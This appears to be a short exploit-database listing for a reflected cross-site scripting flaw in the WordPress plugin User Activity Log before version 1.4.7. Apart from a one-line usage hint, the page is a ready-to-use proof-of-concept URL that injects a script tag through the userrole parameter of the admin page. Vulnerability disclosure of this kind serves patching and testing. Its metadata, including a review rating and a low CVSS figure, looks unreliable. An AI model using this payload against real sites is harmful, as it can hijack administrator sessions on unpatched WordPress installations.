Exploit for User Activity Log < 1.4.7 - Reflected Cross Site Scripting via Query String

Name: Exploit for User Activity Log < 1.4.7 - Reflected Cross Site Scripting via Query String
Rating: 5 (239 reviews)

2021-08-30 | CVSS 0.7

## https://sploitus.com/exploit?id=WPEX-ID:ACCF5522-CB5D-434B-98DA-657E9BA8221E
With a web browser which does not encode characters (or use burp suite and decode the URL via the repeater)

https://example.com/wp-admin/admin.php?page=user_action_log&paged=1&userrole=Administrator"><script>alert(/XSS/)</script>&username=&type=&txtsearch=